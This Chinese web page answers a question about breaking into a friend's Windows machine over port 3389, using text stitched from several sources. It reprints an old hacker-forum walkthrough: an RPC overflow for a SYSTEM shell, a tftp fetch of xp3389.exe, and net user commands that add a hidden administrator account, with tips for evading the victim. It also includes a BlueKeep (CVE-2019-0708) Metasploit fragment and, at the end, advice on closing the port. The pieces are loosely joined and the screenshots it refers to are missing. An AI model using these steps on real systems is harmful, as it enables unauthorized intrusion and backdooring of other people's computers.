我和朋友练习最简单的3389端口入侵,他win2003,我win xp 都开了3389,都无密码,怎样才能最迅速的搞定他

我和朋友练习最简单的3389端口入侵,他win2003,我win xp 都开了3389,都无密码,怎样才能最迅速的搞定他,第1张

一直似乎是牢不可破的。以前也有过一些关于windows xp的溢出但是基本没人成功过。一直到了最近闹的沸沸扬扬的Microsoft RPC接口远程任意代码可执行漏洞才打破了这个神话。但是对于windows xp这个系统我个人认为安全系数还是比较高的。推荐个人使用。

今天我主要要为大家讲的是windows xp的Terminal Services服务。该服务使用的端口是tcp 3389端口。所以开Terminal Services服务的肉鸡大家就习惯管他叫3389鸡。想必大家都玩过win2k的3389吧?但是我最近去了一些论坛有很多人说windows xp的Terminal Services和windows 2000的是一样的。具我的多次实验发现windows xp的3389和windows 2000的3389根本不是一样的而且差的很多。下面我就为大家详细讲解一下windows xp的3389。首先要想清楚看见windows xp的3389就要先开启windows xp的3389。我在网上发现了一个针对开启windows xp3389的小工具。具我多次实验100%可以成功。该工具的名字为

xp3389.exe而且使用也非常简便。直接上传到肉鸡上执行就可以了。由于xp的ipc$默认只是guest权限。用ipc$的思路上传文件是绝对错误的。我归纳出上传文件的方法有两种:

1 利用tftp上传(tftp大家都很熟悉吧?以前提到过N次在这里我就不详细说了)

2 利用ftp来上传

首先我先用时下比较前卫的漏洞135端口的rpc漏洞溢出一台windows xp主机详细看下图:

OK。一举成功。拿到了一个system权限的shell.然后用tftp上传xp3389.exe命令为tftp –I ip get xp3389.exe看下图:

OK上传完毕。然后直接在肉鸡执行就可以了。看下图:

执行完毕以后就成功开启了3389服务。(该程序最大的好处就是执行以后不需要肉鸡重新启动就可以直接登陆。)

对了还有一个问题我要先象大家交代要想登陆xp的3389必须要使用系统没占用的帐号。也就是现在没有正被使用的帐号权限必须还需要是administrators组的。

Guest组是不可以的。我在肉鸡又执行了两条命令分别是:

Net user zihuan ziHUAN /add

Net localgroup administrators zihuan /add

相信大家都能看懂我在肉鸡上建立了一个管理员权限的用户为:zihuan密码为:ziHUAN。

建立好以后直接用远程桌面连接登陆看下图:

然后输入刚才建立的用户和密码登陆看下图:

OK一个完美的xp桌面。是不是非常爽啊?不过你先别高兴。我说了xp的3389和win2k的不一样。不一样的地方有几下几点:

1 你登陆上xp的3389以后该主机原来正在登陆的帐号会自动注销,也就是说xp只支持一个用户登陆。你登陆上去以后漏洞主机的主人就会掉下来:)如果肉鸡的主人发现他掉了下来在登陆的话你就会掉下来:)

2 在你登陆上xp3389肉鸡的主人会收到一条信息。但是如果你动作足够快的话……嘿嘿。

3 登陆上xp3389会把远程的主机的声音带到本地。你可不要害怕哦。解决的办法是把远程桌面连接的远程计算机声音选到留在远程主机看下图:

以上就是针对xp3389的一些思路。希望对光大黑迷以后hacking的时候能有所帮助。根据我测试还发现xp3389.exe还可以开启windows server 2003的3389由于篇幅原因我在这里就不给大家多介绍了。

xp3389.exe可以开启xp的终端。

传到肉鸡上直接运行即可。不需要重新启动。

受影响Windows系统版本:

Windows7、Windows Server 2008 R2、Windows Server 2008、Windows 2003、Windows XP

目标主机:IP地址:192.168.205.135

0号为漏洞验证(check)模块,验证目标主机是否有CVE-2019-0708漏洞,对0模块进行设置并利用:

1、选中漏洞利用模块,设置目标主机IP(RHOSTS)

2、查看漏洞利用模块信息:

3、设置受害机架构

我的虚拟机版本为15.x这里选择targetID=4进行攻击:

漏洞利用成功,可以进行传马等一系列操作,部分指令手册如下:

原指计算机的3389端口, 一般被用来代指远程桌面,可以被修改。它并不是一个木马程序,但如果不是必须的,建议关闭该服务。 原指计算机的3389端口 因为它属于WINDOWS的 远程桌面的 初始端口[可以修改]3389所以一般被用来 代指 远程桌面 微软的远程桌面 是为了方便广大计算机管理员远程管理自己的计算机而设定的, 但是只要有管理密码,3389可以为任何有管理密码的人提供服务…… 大部分黑客都喜欢在 肉鸡上开个3389, 因为3389是系统的正常服务,使用也非常方便。 它能达到 灰鸽子 这类的远程控制软件的一样的效果,最主要它是正常服务…… 3389很容易通过各种扫描工具(如superscan\x-scan等)得到,由于一些电脑使用者缺乏安全意识经常给administrator\new帐户密码留空,这样菜鸟们可以用mstsc.exe以GUI模式登陆别人的电脑.为防止别人利用3389登陆计算机最好给每个帐户设置密码或用防火墙关闭该端口. 编辑本段应用 3389建议关闭. 关闭3389端口的方法: 首先说明3389端口是windows的远程管理终端所开的端口,它并不是一个木马程序,请先确定该服务是否是你自己开放的。如果不是必须的,建议关闭该服务。 win2000 server 开始-->程序-->管理工具-->服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。 win2000 pro 开始-->设置-->控制面板-->管理工具-->服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。 windows xp关闭的方法:在我的电脑上点右键选属性-->远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。 通过注册表关闭3389端口 开始---运行 输入regedit打开注册表 [HKEY_LOCAL_MACHINE\System\control\Terminalserver\wds\rdpwd\tds\tcp分支,选中名为portnumber的键值,将其3389改为其他(如1234)看我操作这里control有2个分别为controlSET001 和controlSET002我一个一个来 先进controlSET001再来controlSET002 下面我们在看currentcontrolset [HKEY_LOCAL_MACHINE\System\currentcontrolset\control\Terminalserver\winstations\RDP-Tcp\PortNumber分支里应该有一个或者很多类似的子键,一样的改他的值3389为其他(如1234)


欢迎分享,转载请注明来源:夏雨云

原文地址:https://www.xiayuyun.com/zonghe/417751.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2023-05-24
下一篇2023-05-24

发表评论

登录后才能评论

评论列表(0条)

    保存